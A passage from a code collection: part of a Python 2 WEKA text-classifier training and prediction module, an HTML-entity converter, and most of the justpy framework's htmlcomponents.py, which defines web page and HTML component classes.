entries, so use the first to grab the bag of words print "Saving bag of words..." self.__save_bag_of_words(tids[0], 0) self.__save_bag_of_words(tids[0], 1) for tid in sorted(tids): print "Preparing tid %d" % tid self.__prepare_arff(tid) for tid in sorted(tids): print "Spread subsampling for tid %d" % tid Popen(("java -cp %s weka.filters.supervised.instance.SpreadSubsample " + "-M 1.0 -X 0.0 -S 1 -c last " + "-i %s%d-wordvec.arff -o %s%d-wordvec-subsample.arff") % \ (paths['weka.weka_jar'], paths['weka.training_arff_dir'], tid, paths['weka.training_arff_dir'], tid), shell = True).communicate() print "Training random forests for tid %d" % tid Popen(("java -cp %s %s %s -v " + "-t %s%d-wordvec-subsample.arff -d %s%d.model") % \ (paths['weka.weka_jar'], config['weka.classifier'], config['weka.classifier_params'], paths['weka.training_arff_dir'], tid, paths['weka.training_arff_dir'], tid), shell = True, stdout = PIPE).communicate() print out def train_experiment(self): model_scores = {} models = {'random-forest': ('weka.classifiers.trees.RandomForest', '-I 20 -K 0'), 'naive-bayes': ('weka.classifiers.bayes.NaiveBayes', ''), 'bayesnet': ('weka.classifiers.bayes.BayesNet', ''), 'j48': ('weka.classifiers.trees.J48', ''), 'knn': ('weka.classifiers.lazy.IBk', '-K 3')} tids = self.__get_tids() # all tid arffs have same entries, so use the first to grab the bag of words print "Saving bag of words..." self.__save_bag_of_words(tids[0], 0) self.__save_bag_of_words(tids[0], 1) for tid in sorted(tids): print "Preparing tid %d" % tid self.__prepare_arff(tid) for tid in sorted(tids): print "Spread subsampling for tid %d" % tid Popen(("java -cp %s weka.filters.supervised.instance.SpreadSubsample " + "-M 1.0 -X 0.0 -S 1 -c last " + "-i %s%d-wordvec.arff -o %s%d-wordvec-subsample.arff") % \ (paths['weka.weka_jar'], paths['weka.training_arff_dir'], tid, paths['weka.training_arff_dir'], tid), shell = True).communicate() for tid in sorted(tids): model_scores[tid] = {} for model in models.keys(): print "Training %s for tid %d" % (models[model][0], tid) (out, _) = Popen(("java -cp %s %s %s -v " + "-t %s%d-wordvec-subsample.arff -d %s%d.model") % \ (paths['weka.weka_jar'], models[model][0], models[model][1], paths['weka.training_arff_dir'], tid, paths['weka.training_arff_dir'], tid), shell = True, stdout = PIPE).communicate() correct = 0.0 for line in out.splitlines(): m = re.search(r'Correctly Classified Instances\s+\d+\s+(.*) %', line) if m: correct = float(m.group(1)) break model_scores[tid][model] = correct with open('training_experiment.csv', 'w') as csvfile: writer = csv.writer(csvfile) writer.writerow(['model', 'tid', 'correct']) for tid in model_scores.keys(): for model in model_scores[tid].keys(): writer.writerow([model, tid, model_scores[tid][model]]) def __predict_arff(self): tids = self.__get_tids() # the testing file should always be 0.arff self.__prepare_arff(0) predictions = {} for tid in sorted(tids): predictions[tid] = [] print "Predicting tid %d" % tid (out, err) = Popen(("java -cp %s %s " + "-T %s0-wordvec.arff -l %s%d.model -p last") % \ (paths['weka.weka_jar'], config['weka.classifier'], paths['weka.training_arff_dir'], paths['weka.training_arff_dir'], tid), shell = True, stdout = PIPE).communicate() for line in out.splitlines(): m = re.search(r'2:no\s+[12]:(no|yes)\s+\+?\s+(\d+\.?\d*)', line) if m: answer = False if m.group(1) == 'yes': answer = True conf = float(m.group(2)) if conf < 0.75: answer = False predictions[tid].append((answer, conf)) return predictions def predict(self, articles): # modifies the provided articles dict data = {'attributes': [('title', 'STRING'), ('body', 'STRING'), ('class', ['yes', 'no'])], 'data': [], 'description': u'', 'relation': '0'} for urlid in sorted(articles.keys()): title = re.sub(r'\W', ' ', articles[urlid]['title']) body = re.sub(r'\W', ' ', articles[urlid]['summary']) data['data'].append([title, body, 'no']) # make the testing file 0.arff fnew = open("%s0.arff" % paths['weka.training_arff_dir'], 'w') arff.dump(fnew, data) fnew.close() predictions = self.__predict_arff() for urlid in sorted(articles.keys()): articles[urlid]['categories'] = [] tids = self.__get_tids() for tid in sorted(tids): for (i, urlid) in enumerate(sorted(articles.keys())): if predictions[tid][i][0]: articles[urlid]['categories'].append(str(tid)) ``` #### File: AAAI/AINews/ents.py ```python import re import htmlentitydefs def convert(s): """Take an input string s, find all things that look like SGML character entities, and replace them with the Unicode equivalent. Function is from: http://stackoverflow.com/questions/1197981/convert-html-entities-to-ascii-in-python/1582036#1582036 """ matches = re.findall("&#\d+;", s) if len(matches) > 0: hits = set(matches) for hit in hits: name = hit[2:-1] try: entnum = int(name) s = s.replace(hit, unichr(entnum)) except ValueError: pass matches = re.findall("&\w+;", s) hits = set(matches) amp = "&" if amp in hits: hits.remove(amp) for hit in hits: name = hit[1:-1] if name in htmlentitydefs.name2codepoint: s = s.replace(hit, unichr(htmlentitydefs.name2codepoint[name])) s = s.replace(amp, "&") return s ```
{ "source": "AAAI-DISIM-UnivAQ/justpy", "score": 2 }
#### File: justpy/justpy/htmlcomponents.py ```python from types import MethodType from addict import Dict import json, copy, inspect, sys, re from html.parser import HTMLParser, tagfind_tolerant, attrfind_tolerant from html.entities import name2codepoint from html import unescape from jinja2 import Template import asyncio from .tailwind import Tailwind import logging import httpx # Dictionary for translating from tag to class _tag_class_dict = {} def parse_dict(cls): """ Decorator for component class definitions that updates _tag_class_dict so that the parser can recognize new components Required only for components not defined in this module """ _tag_class_dict[cls.html_tag] = cls return cls class JustPy: loop = None log = None class WebPage: # TODO: Add page events such as online, beforeunload, resize, visibilitychange instances = {} sockets = {} next_page_id = 0 use_websockets = True delete_flag = True tailwind = True debug = False highcharts_theme = None # One of ['avocado', 'dark-blue', 'dark-green', 'dark-unica', 'gray', # 'grid-light', 'grid', 'high-contrast-dark', 'high-contrast-light', 'sand-signika', 'skies', 'sunset'] allowed_events = ['click', 'visibilitychange', 'page_ready', 'result_ready'] def __init__(self, **kwargs): self.page_id = WebPage.next_page_id WebPage.next_page_id += 1 self.cache = None # Set this attribute if you want to use the cache. self.use_cache = False # Determines whether the page uses the cache or not self.template_file = 'tailwind.html' self.title = 'JustPy' self.display_url = None self.redirect = None self.open = None self.favicon = None self.components = [] # list of direct children components on page self.cookies = {} self.css = '' self.head_html = '' self.body_html = '' # If html attribute is not empty, sets html of page directly self.html = '' self.body_style = '' self.body_classes = '' self.reload_interval = None self.events = [] self.dark = False # Set to True for Quasar dark mode (use for other dark modes also) self.data = {} WebPage.instances[self.page_id] = self for k, v in kwargs.items(): self.__setattr__(k, v) def __repr__(self): return f'{self.__class__.__name__}(page_id: {self.page_id}, number of components: {len(self.components)}, reload interval: {self.reload_interval})' def __len__(self): return len(self.components) def add_component(self, child, position=None): if position is None: self.components.append(child) else: self.components.insert(position, child) return self async def on_disconnect(self, websocket=None): if self.delete_flag: self.delete_components() self.remove_page() def remove_page(self): WebPage.instances.pop(self.page_id) def delete_components(self): for c in self.components: c.delete() self.components = [] def add(self, *args): for component in args: self.add_component(component) return self def __add__(self, other): self.add_component(other) return self def __iadd__(self, other): self.add_component(other) return self def remove_component(self, component): try: self.components.remove(component) except: raise Exception('Component cannot be removed because it was not in Webpage') return self def remove(self, component): self.remove_component(component) def get_components(self): return self.components def last(self): return self.components[-1] def set_cookie(self, k, v): self.cookies[str(k)] = str(v) def delete_cookie(self, k): if k in self.cookies: del (self.cookies[str(k)]) async def run_javascript(self, javascript_string, *, request_id=None, send=True): try: websocket_dict = WebPage.sockets[self.page_id] except: return self dict_to_send = {'type': 'run_javascript', 'data': javascript_string, 'request_id': request_id, 'send': send} await asyncio.gather(*[websocket.send_json(dict_to_send) for websocket in list(websocket_dict.values())], return_exceptions=True) return self async def reload(self): return await self.run_javascript('location.reload()') async def update_old(self, *, built_list=None): try: websocket_dict = WebPage.sockets[self.page_id] except: return self if not built_list: component_build = self.build_list() else: component_build = built_list for websocket in list(websocket_dict.values()): try: WebPage.loop.create_task(websocket.send_json({'type': 'page_update', 'data': component_build, 'page_options': {'display_url': self.display_url, 'title': self.title, 'redirect': self.redirect, 'open': self.open, 'favicon': self.favicon}})) except: print('Problem with websocket in page update, ignoring') return self async def update(self, websocket=None): try: websocket_dict = WebPage.sockets[self.page_id] except: return self page_build = self.build_list() dict_to_send = {'type': 'page_update', 'data': page_build, 'page_options': {'display_url': self.display_url, 'title': self.title, 'redirect': self.redirect, 'open': self.open, 'favicon': self.favicon}} if websocket: WebPage.loop.create_task(websocket.send_json(dict_to_send)) else: await asyncio.gather(*[websocket.send_json(dict_to_send) for websocket in list(websocket_dict.values())], return_exceptions=True) return self async def delayed_update(self, delay): await asyncio.sleep(delay) return await self.update() def to_html(self, indent=0, indent_step=0, format=True): block_indent = ' ' * indent if format: ws = '\n' else: ws = '' s = f'{block_indent}<div>{ws}' for c in self.components: s = f'{s}{c.to_html(indent + indent_step, indent_step, format)}' s = f'{s}{block_indent}</div>{ws}' return s def react(self): pass def build_list(self): object_list = [] self.react() for i, obj in enumerate(self.components): obj.react(self.data) d = obj.convert_object_to_dict() object_list.append(d) return object_list def on(self, event_type, func): if event_type in self.allowed_events: if inspect.ismethod(func): setattr(self, 'on_' + event_type, func) else: setattr(self, 'on_' + event_type, MethodType(func, self)) if event_type not in self.events: self.events.append(event_type) else: raise Exception(f'No event of type {event_type} supported') async def run_event_function(self, event_type, event_data, create_namespace_flag=True): event_function = getattr(self, 'on_' + event_type) if create_namespace_flag: function_data = Dict(event_data) else: function_data = event_data if inspect.iscoroutinefunction(event_function): event_result = await event_function(function_data) else: event_result = event_function(function_data) return event_result class TailwindUIPage(WebPage): # https://tailwindui.com/components def __init__(self, **kwargs): super().__init__(**kwargs) self.template_file = 'tailwindui.html' class JustpyBaseComponent(Tailwind): next_id = 1 instances = {} temp_flag = True delete_flag = True needs_deletion = False def __init__(self, **kwargs): cls = JustpyBaseComponent temp = kwargs.get('temp', cls.temp_flag) delete_flag = kwargs.get('delete_flag', cls.delete_flag) if temp and delete_flag: self.id = None else: self.id = cls.next_id cls.next_id += 1 self.events = [] self.event_modifiers = Dict() self.transition = None self.allowed_events = [] def initialize(self, **kwargs): for k, v in kwargs.items(): self.__setattr__(k, v) self.set_keyword_events(**kwargs) for com in ['a', 'add_to']: if com in kwargs.keys(): kwargs[com].add_component(self) def set_keyword_events(self, **kwargs): for e in self.allowed_events: for prefix in ['', 'on', 'on_']: if prefix + e in kwargs.keys(): cls = JustpyBaseComponent if not self.id: self.id = cls.next_id cls.next_id += 1 fn = kwargs[prefix + e] if isinstance(fn, str): fn_string = f'def oneliner{self.id}(self, msg):\n {fn}' exec(fn_string) self.on(e, locals()[f'oneliner{self.id}']) else: self.on(e, fn) break def delete(self): if self.needs_deletion: if self.delete_flag: JustpyBaseComponent.instances.pop(self.id) self.needs_deletion = False def on(self, event_type, func, debounce=None, throttle=None, immediate=False): if event_type in self.allowed_events: cls = JustpyBaseComponent if not self.id: self.id = cls.next_id cls.next_id += 1 cls.instances[self.id] = self self.needs_deletion = True if inspect.ismethod(func): setattr(self, 'on_' + event_type, func) else: setattr(self, 'on_' + event_type, MethodType(func, self)) if event_type not in self.events: self.events.append(event_type) if debounce: self.event_modifiers[event_type].debounce = {'value': debounce, 'timeout': None, 'immediate': immediate} elif throttle: self.event_modifiers[event_type].throttle = {'value': throttle, 'timeout': None} else: raise Exception(f'No event of type {event_type} supported') def remove_event(self, event_type): if event_type in self.events: self.events.remove(event_type) def has_event_function(self, event_type): if getattr(self, 'on_' + event_type, None): return True else: return False def has_class(self, class_name): return class_name in self.classes.split() def remove_class(self, tw_class): class_list = self.classes.split() try: class_list.remove(tw_class) except: pass self.classes = ' '.join(class_list) def hidden(self, flag=True): if flag: self.set_class('hidden') else: self.remove_class('hidden') def hidden_toggle(self): if self.has_class('hidden'): self.remove_class('hidden') else: self.set_class('hidden') async def update(self, socket=None): component_dict = self.convert_object_to_dict() if socket: WebPage.loop.create_task(socket.send_json({'type': 'component_update', 'data': component_dict})) else: pages_to_update = list(self.pages.values()) for page in pages_to_update: try: websocket_dict = WebPage.sockets[page.page_id] except: continue for websocket in list(websocket_dict.values()): try: WebPage.loop.create_task(websocket.send_json({'type': 'component_update', 'data': component_dict})) except: print('Problem with websocket in component update, ignoring') return self def check_transition(self): if self.transition and (not self.id): cls = JustpyBaseComponent self.id = cls.next_id cls.next_id += 1 async def run_method(self, command, websocket): await websocket.send_json({'type': 'run_method', 'data': command, 'id': self.id}) # So the page itself does not update, return True not None return True def remove_page_from_pages(self, wp: WebPage): self.pages.pop(wp.page_id) def add_page(self, wp: WebPage): self.pages[wp.page_id] = wp def add_page_to_pages(self, wp: WebPage): self.pages[wp.page_id] = wp def set_model(self, value): if hasattr(self, 'model'): if len(self.model) == 2: self.model[0].data[self.model[1]] = value else: self.model[0][self.model[1]] = value def get_model(self): if len(self.model) == 2: model_value = self.model[0].data[self.model[1]] else: model_value = self.model[0][self.model[1]] return model_value async def run_event_function(self, event_type, event_data, create_namespace_flag=True): event_function = getattr(self, 'on_' + event_type) if create_namespace_flag: function_data = Dict(event_data) else: function_data = event_data if inspect.iscoroutinefunction(event_function): event_result = await event_function(function_data) else: event_result = event_function(function_data) return event_result @staticmethod def convert_dict_to_object(d): obj = globals()[d['class_name']]() for obj_prop in d['object_props']: obj.add(JustpyBaseComponent.convert_dict_to_object(obj_prop)) for k, v in d.items(): obj.__dict__[k] = v for k, v in d['attrs'].items(): obj.__dict__[k] = v return obj class HTMLBaseComponent(JustpyBaseComponent): """ Base Component for all HTML components """ attributes = [] html_tag = 'div' vue_type = 'html_component' # Vue.js component name html_global_attributes = ['accesskey', 'class', 'contenteditable', 'dir', 'draggable', 'dropzone', 'hidden', 'id', 'lang', 'spellcheck', 'style', 'tabindex', 'title'] attribute_list = ['id', 'vue_type', 'show', 'events', 'event_modifiers', 'classes', 'style', 'set_focus', 'html_tag', 'class_name', 'event_propagation', 'inner_html', 'animation', 'debug', 'transition'] # not_used_global_attributes = ['dropzone', 'translate', 'autocapitalize', # 'itemid', 'itemprop', 'itemref', 'itemscope', 'itemtype'] # Additions to global attributes to add to attrs dict apart from id and style. used_global_attributes = ['contenteditable', 'dir', 'tabindex', 'title', 'accesskey', 'draggable', 'lang', 'spellcheck'] # https://developer.mozilla.org/en-US/docs/Web/HTML/Element # windows_events = ['afterprint', 'beforeprint', 'beforeunload', 'error', 'hashchange', 'load', # 'message', 'offline', 'online', 'pagehide', 'pageshow', 'popstate', # 'resize', 'storage', 'unload'] # form_events = ['blur', 'change', 'contextmenu', 'focus', 'input', 'invalid', 'reset', 'search', 'select', 'submit'] # keyboard_events = ['keydown', 'keypress', 'keyup'] # mouse_events = ['click', 'dblclick', 'mousedown', 'mousemove', 'mouseout', 'mouseover', 'mouseup', 'wheel', # 'mouseenter', 'mouseleave'] # allowed_events = ['click', 'mouseover', 'mouseout', 'mouseenter', 'mouseleave', 'input', 'change', # 'after', 'before', 'keydown', 'keyup', 'keypress', 'focus', 'blur'] # allowed_events = ['click', 'mouseover', 'mouseout', 'mouseenter', 'mouseleave', 'input', 'change', # 'after', 'before', 'keydown', 'keyup', 'keypress', 'focus', 'blur', 'submit', # 'dragstart', 'dragover', 'drop'] def __init__(self, **kwargs): super().__init__(**kwargs) self.class_name = type(self).__name__ self.debug = False self.inner_html = '' self.animation = False self.pages = {} # Dictionary of pages the component is on. Not managed by framework. self.show = True self.set_focus = False self.classes = '' self.slot = None self.scoped_slots = {} # For Quasar and other Vue.js based components self.style = '' self.directives = [] self.data = {} self.drag_options = None self.allowed_events = ['click', 'mouseover', 'mouseout', 'mouseenter', 'mouseleave', 'input', 'change', 'after', 'before', 'keydown', 'keyup', 'keypress', 'focus', 'blur', 'submit', 'dragstart', 'dragover', 'drop', 'click__out'] self.events = [] self.event_modifiers = Dict() self.additional_properties = [] # Additional fields to get from the JavasScript event object self.event_propagation = True # If True events are propagated self.prop_list = [] # For components from libraries like quasar self.initialize(**kwargs) def __len__(self): if hasattr(self, 'components'): return len(self.components) else: return 0 def __repr__(self): name = self.name if hasattr(self, 'name') else 'No name' return f'{self.__class__.__name__}(id: {self.id}, html_tag: {self.html_tag}, vue_type: {self.vue_type}, name: {name}, number of components: {len(self)})' def add_to_page(self, wp: WebPage): wp.add_component(self) def add_to(self, *args): for c in args: c.add_component(self) def add_attribute(self, attr, value): self.attrs[attr] = value def add_event(self, event_type): if event_type not in self.allowed_events: self.allowed_events.append(event_type) def add_allowed_event(self, event_type): self.add_event(event_type) def add_scoped_slot(self, slot, c): self.scoped_slots[slot] = c def to_html(self, indent=0, indent_step=0, format=True): block_indent = ' ' * indent if format: ws = '\n' else: ws = '' s = f'{block_indent}<{self.html_tag} ' d = self.convert_object_to_dict() for attr, value in d['attrs'].items(): if value: s = f'{s}{attr}="{value}" ' if self.classes: s = f'{s}class="{self.classes}"/>{ws}' else: s = f'{s}/>{ws}' return s def react(self, data): return def convert_object_to_dict(self): d = {} # Add id if CSS transition is defined if self.transition: self.check_transition() if self.id: d['attrs'] = {'id': str(self.id)} else: d['attrs'] = {} for attr in HTMLBaseComponent.attribute_list: d[attr] = getattr(self, attr) d['directives'] = {} for i in self.directives: if i[0:2] == 'v-': # It is a directive try: d['directives'][i[2:]] = getattr(self, i.replace('-', '_')) except: pass for i in self.prop_list + self.attributes + HTMLBaseComponent.used_global_attributes: try: d['attrs'][i] = getattr(self, i) except: pass if i in ['in', 'from']: # Attributes that are also python reserved words try: d['attrs'][i] = getattr(self, '_' + i) except: pass if '-' in i: s = i.replace('-', '_') # kebab case to snake case try: d['attrs'][i] = getattr(self, s) except: pass # Name is a special case. Allow it to be defined for all try: d['attrs']['name'] = self.name except: pass d['scoped_slots'] = {} for s in self.scoped_slots: d['scoped_slots'][s] = self.scoped_slots[s].convert_object_to_dict() if self.additional_properties: d['additional_properties'] = self.additional_properties if self.drag_options: d['drag_options'] = self.drag_options return d class Div(HTMLBaseComponent): # A general purpose container # This is a component that other components can be added to html_tag = 'div' def __init__(self, **kwargs): self.html_entity = False self.children = [] super().__init__(**kwargs) self.components = self.children.copy() def delete(self): if self.delete_flag: for c in self.components: c.delete() if self.needs_deletion: JustpyBaseComponent.instances.pop(self.id) self.components = [] def __getitem__(self, index): return self.components[index] def add_component(self, child, position=None, slot=None): if slot: child.slot = slot if position is None: self.components.append(child) else: self.components.insert(position, child) return self def delete_components(self): for c in self.components: c.delete() self.components = [] def add(self, *args): for component in args: self.add_component(component) return self def __add__(self, child): self.add_component(child) return self def __iadd__(self, child): self.add_component(child) return self def add_first(self, child): self.add_component(child, 0) def remove_component(self, component): try: self.components.remove(component) except: raise Exception('Component cannot be removed because it is not contained in element') return self def remove(self, component): self.remove_component(component) def get_components(self): return self.components def first(self): return self.components[0] def last(self): return self.components[-1] def to_html(self, indent=0, indent_step=0, format=True): block_indent = ' ' * indent if format: ws = '\n' else: ws = '' s = f'{block_indent}<{self.html_tag} ' d = self.convert_object_to_dict() for attr, value in d['attrs'].items(): if value: s = f'{s}{attr}="{value}" ' if self.style: s = f'{s}style="{self.style}"' if self.classes: s = f'{s}class="{self.classes}">{ws}' else: s = f'{s}>{ws}' if self.inner_html: s = f'{s}{self.inner_html}</{self.html_tag}>{ws}' return s try: s = f'{s}{self.text}{ws}' except: pass for c in self.components: s = f'{s}{c.to_html(indent + indent_step, indent_step, format)}' s = f'{s}{block_indent}</{self.html_tag}>{ws}' return s def model_update(self): # [wp, 'text'] for example # self.text = str(self.model[0].data[self.model[1]]) self.text = self.get_model() def build_list(self): object_list = [] for i, obj in enumerate(self.components): obj.react(self.data) d = obj.convert_object_to_dict() object_list.append(d) return object_list def convert_object_to_dict(self): d = super().convert_object_to_dict() if hasattr(self, 'model'): self.model_update() d['object_props'] = self.build_list() if hasattr(self, 'text'): self.text = str(self.text) d['text'] = self.text # Handle HTML entities. Warning: They should be in their own span or div. Setting inner_html overrides all else in container if self.html_entity: d['inner_html'] = self.text return d class Input(Div): # Edge and Internet explorer do not support the input event for checkboxes and radio buttons. Use change instead # IMPORTANT: Scope of name of radio buttons is the whole page and not the form unless form is specified html_tag = 'input' attributes = ['accept', 'alt', 'autocomplete', 'autofocus', 'checked', 'dirname', 'disabled', 'form', 'formaction', 'formenctype', 'formmethod', 'formnovalidate', 'formtarget', 'height', 'list', 'max', 'maxlength', 'min', 'minlength', 'multiple', 'name', 'pattern', 'placeholder', 'readonly', 'required', 'size', 'src', 'step', 'type', 'value', 'width'] def __init__(self, **kwargs): self.value = '' self.checked = False self.debounce = 200 # 200 millisecond default debounce for events self.no_events = False # Types for input element: # ['button', 'checkbox', 'color', 'date', 'datetime-local', 'email', 'file', 'hidden', 'image', # 'month', 'number', 'password', 'radio', 'range', 'reset', 'search', 'submit', 'tel', 'text', 'time', 'url', 'week'] self.type = 'text' self.form = None super().__init__(**kwargs) def default_input(self, msg): return self.before_event_handler(msg) if not self.no_events: self.on('before', default_input) def __repr__(self): num_components = len(self.components) return f'{self.__class__.__name__}(id: {self.id}, html_tag: {self.html_tag}, input_type: {self.type}, vue_type: {self.vue_type}, value: {self.value}, checked: {self.checked}, number of components: {num_components})' def before_event_handler(self, msg): JustPy.log.debug('%s %s %s %s %s', 'before ', self.type, msg.event_type, msg.input_type, msg) if msg.event_type not in ['input', 'change', 'select']: return if msg.input_type == 'checkbox': # The checked field is boolean self.checked = msg.checked if hasattr(self, 'model'): self.model[0].data[self.model[1]] = msg.checked elif msg.input_type == 'radio': # If a radio field, all other radio buttons with same name need to have value changed # If form is specified, the scope is that form. If not, it is the whole page self.checked = True if self.form: Input.radio_button_set(self, self.form) else: Input.radio_button_set(self, msg.page) if hasattr(self, 'model'): self.model[0].data[self.model[1]] = msg.value self.value = msg.value else: if msg.input_type == 'number': try: msg.value = int(msg.value) except: msg.value = float(msg.value) if hasattr(self, 'model'): # self.model[0].data[self.model[1]] = msg.value self.set_model(msg.value) self.value = msg.value @staticmethod def radio_button_set(radio_button, container): # Set all radio buttons in container with same name as radio_button to unchecked if hasattr(container, 'components'): for c in container.components: if hasattr(c, 'name'): if c.name == radio_button.name and not radio_button.id == c.id: c.checked = False Input.radio_button_set(radio_button, c) @staticmethod def radio_button_set_model_update(radio_button, container, model_value): for c in container.components: if hasattr(c, 'name'): if c.name == radio_button.name: if c.value == model_value: c.checked = True else: c.checked = False Input.radio_button_set_model_update(radio_button, c, model_value) def model_update(self): # update_value = self.model[0].data[self.model[1]] update_value = self.get_model() if self.type == 'checkbox': self.checked = update_value elif self.type == 'radio': model_value = update_value if self.form: Input.radio_button_set_model_update(self, self.form, model_value) else: Input.radio_button_set_model_update(self, self.model[0], model_value) else: self.value = update_value def convert_object_to_dict(self): d = super().convert_object_to_dict() d['debounce'] = self.debounce d['input_type'] = self.type # Needed for vue component updated life hook and event handler if self.type in ['text', 'textarea']: d['value'] = str(self.value) else: d['value'] = self.value d['attrs']['value'] = self.value d['checked'] = self.checked if not self.no_events: if self.type in ['radio', 'checkbox', 'select'] or self.type == 'file': # Not all browsers create input event if 'change' not in self.events: self.events.append('change') else: if 'input' not in self.events: self.events.append('input') if self.checked: d['attrs']['checked'] = True else: d['attrs']['checked'] = False try: d['attrs']['form'] = self.form.id except: pass return d class InputChangeOnly(Input): """ Does not generate the 'input' event. Generates the 'change' event. Leaves other events unchanged. Use if you don't need to look at each character typed. Saves interaction with the server The 'change' event docs: https://developer.mozilla.org/en-US/docs/Web/API/HTMLElement/change_event Salient: When the element loses focus after its value was changed, but not committed (e.g., after editing the value of <textarea> or <input type="text">) or when Enter is pressed. """ def convert_object_to_dict(self): d = super().convert_object_to_dict() d['events'].remove('input') if 'change' not in d['events']: d['events'].append('change') return d class Form(Div): html_tag = 'form' attributes = ['accept-charset', 'action', 'autocomplete', 'enctype', 'method', 'name', 'novalidate', 'target'] def __init__(self, **kwargs): super().__init__(**kwargs) def default_submit(self, msg): print('Default form submit', msg.form_data) return True if not self.has_event_function('submit'): # If an event handler is not assigned, the front end cannot stop the default page request that happens when a form is submitted self.on('submit', default_submit) class Label(Div): html_tag = 'label' attributes = ['for', 'form'] # In JustPy these are components, not ids of component like in HTML def __init__(self, **kwargs): self.for_component = None super().__init__(**kwargs) def convert_object_to_dict(self): d = super().convert_object_to_dict() try: d['attrs']['for'] = self.for_component.id except: pass try: d['attrs']['form'] = self.form.id except: pass return d class Textarea(Input): html_tag = 'textarea' attributes = ['autofocus', 'cols', 'dirname', 'disabled', 'form', 'maxlength', 'name', 'placeholder', 'readonly', 'required', 'rows', 'wrap', 'value'] def __init__(self, **kwargs): self.rows = '4' self.cols = '50' super().__init__(**kwargs) self.type = 'textarea' self.input_type = 'text' class Select(Input): # Need to set value of select on creation, otherwise blank line will show on page update html_tag = 'select' attributes = ['autofocus', 'disabled', 'form', 'multiple', 'name', 'required', 'size'] def __init__(self, **kwargs): super().__init__(**kwargs) self.type = 'select' class A(Div): html_tag = 'a' attributes = ['download', 'href', 'hreflang', 'media', 'ping', 'rel', 'target', 'type'] def __init__(self, **kwargs): self.href = None self.bookmark = None # The component on page to jump to or scroll to self.title = '' self.rel = "noopener noreferrer" self.download = None # If attribute is set, file is downloaded, only works html 5 https://www.w3schools.com/tags/att_a_download.asp self.target = '_self' # _blank, _self, _parent, _top, framename # https://developer.mozilla.org/en-US/docs/Web/API/Element/scrollIntoView self.scroll = False # If True, scrolling is enabled self.scroll_option = 'smooth' # One of "auto" or "smooth". self.block_option = 'start' # One of "start", "center", "end", or "nearest". Defaults to "start". self.inline_option = 'nearest' # One of "start", "center", "end", or "nearest". Defaults to "nearest". super().__init__(**kwargs) if not kwargs.get('click'): def default_click(self, msg): return True self.on('click', default_click) def convert_object_to_dict(self): d = super().convert_object_to_dict() d['scroll'] = self.scroll d['scroll_option'] = self.scroll_option d['block_option'] = self.block_option d['inline_option'] = self.inline_option if self.bookmark is not None: self.href = '#' + str(self.bookmark.id) self.scroll_to = str(self.bookmark.id) if d['scroll']: d['scroll_to'] = self.scroll_to d['attrs']['href'] = self.href d['attrs']['target'] = self.target if self.download is not None: d['attrs']['download'] = self.download return d Link = A # The 'Link' name is more descriptive and can be used instead class Icon(Div): def __init__(self, **kwargs): self.icon = 'dog' # Default icon super().__init__(**kwargs) def convert_object_to_dict(self): d = super().convert_object_to_dict() d['classes'] = self.classes + ' fa fa-' + self.icon return d class EditorMD(Textarea): # https://www.cssportal.com/style-input-range/ style an input range # Set the page's tailwind attribute to False for preview to work def __init__(self, **kwargs): super().__init__(**kwargs) self.debounce = 0 self.input_type = 'textarea' self.vue_type = 'editorjp' self.html_tag = 'textarea' class Space(Div): # Creates a span with hard spaces. def __init__(self, **kwargs): super().__init__(**kwargs) self.num = kwargs.get('num', 1) self.html_tag = 'span' self.inner_html = '&nbsp;' * self.num # Non html components class TabGroup(Div): """ Displays a tab based on its value. Has a dict of tabs whose keys is the value. A tab is any JustPy component. format of dict: {'value1': {'tab': comp1, 'order': number}, 'value2': {'tab': comp2, 'order': number} ...} self.tabs - tab dict self.animation_next = 'slideInRight' set animation for tab coming in self.animation_prev = 'slideOutLeft' set animation for tab going out self.animation_speed = 'faster' can be on of '' | 'slow' | 'slower' | 'fast' | 'faster' self.value value of group and tab to display self.previous - previous tab, no need to change except to set to '' in order to display tab without animation which is default at first """ wrapper_classes = ' ' wrapper_style = 'display: flex; position: absolute; width: 100%; height: 100%; align-items: center; justify-content: center; background-color: #fff;' def __init__(self, **kwargs): self.tabs = {} # Dict with format 'value': {'tab': Div component, 'order': number} for each entry self.value = '' self.previous_value = '' # https://github.com/daneden/animate.css self.animation_next = 'slideInRight' self.animation_prev = 'slideOutLeft' self.animation_speed = 'faster' # '' | 'slow' | 'slower' | 'fast' | 'faster' super().__init__(**kwargs) def __setattr__(self, key, value): if key == 'value': try: self.previous_value = self.value except: pass self.__dict__[key] = value def model_update(self): self.value = self.model[0].data[self.model[1]] def convert_object_to_dict(self): self.components = [] self.wrapper_div_classes = self.animation_speed # Component in this will be centered if self.previous_value: self.wrapper_div = Div(classes=self.wrapper_div_classes, animation=self.animation_next, temp=True, style=f'{self.__class__.wrapper_style} z-index: 50;', a=self) self.wrapper_div.add(self.tabs[self.value]['tab']) self.wrapper_div = Div(classes=self.wrapper_div_classes, animation=self.animation_prev, temp=True, style=f'{self.__class__.wrapper_style} z-index: 0;', a=self) self.wrapper_div.add(self.tabs[self.previous_value]['tab']) else: self.wrapper_div = Div(classes=self.wrapper_div_classes, temp=True, a=self, style=self.__class__.wrapper_style) self.wrapper_div.add(self.tabs[self.value]['tab']) self.style = ' position: relative; overflow: hidden; ' + self.style # overflow: hidden; d = super().convert_object_to_dict() return d # HTML tags for which corresponding classes will be created _tag_create_list = ['address', 'article', 'aside', 'footer', 'header', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'main', 'nav', 'section', 'blockquote', 'dd', 'dl', 'dt', 'figcaption', 'figure', 'hr', 'li', 'ol', 'p', 'pre', 'ul', 'abbr', 'b', 'bdi', 'bdo', 'br', 'cite', 'code', 'data', 'dfn', 'em', 'i', 'kbd', 'mark', 'q', 'rb', 'rp', 'rt', 'rtc', 'ruby', 's', 'samp', 'small', 'span', 'strong', 'sub', 'sup', 'time', 'tt', 'u', 'var', 'wbr', 'area', 'audio', 'img', 'map', 'track', 'video', 'embed', 'iframe', 'object', 'param', 'picture', 'source', 'del', 'ins', 'title', 'caption', 'col', 'colgroup', 'table', 'tbody', 'td', 'tfoot', 'th', 'thead', 'tr', 'button', 'fieldset', 'legend', 'meter', 'optgroup', 'option', 'progress', # datalist not supported 'details', 'summary', 'style' # dialog not supported ] # Only tags that have non-gloabal attributes that are supported by HTML 5 are in this dict _attr_dict = {'a': ['download', 'href', 'hreflang', 'media', 'ping', 'rel', 'target', 'type'], 'area': ['alt', 'coords', 'download', 'href', 'hreflang', 'media', 'rel', 'shape', 'target', 'type'], 'audio': ['autoplay', 'controls', 'loop', 'muted', 'preload', 'src'], 'base': ['href', 'target'], 'bdo': ['dir'], 'blockquote': ['cite'], 'button': 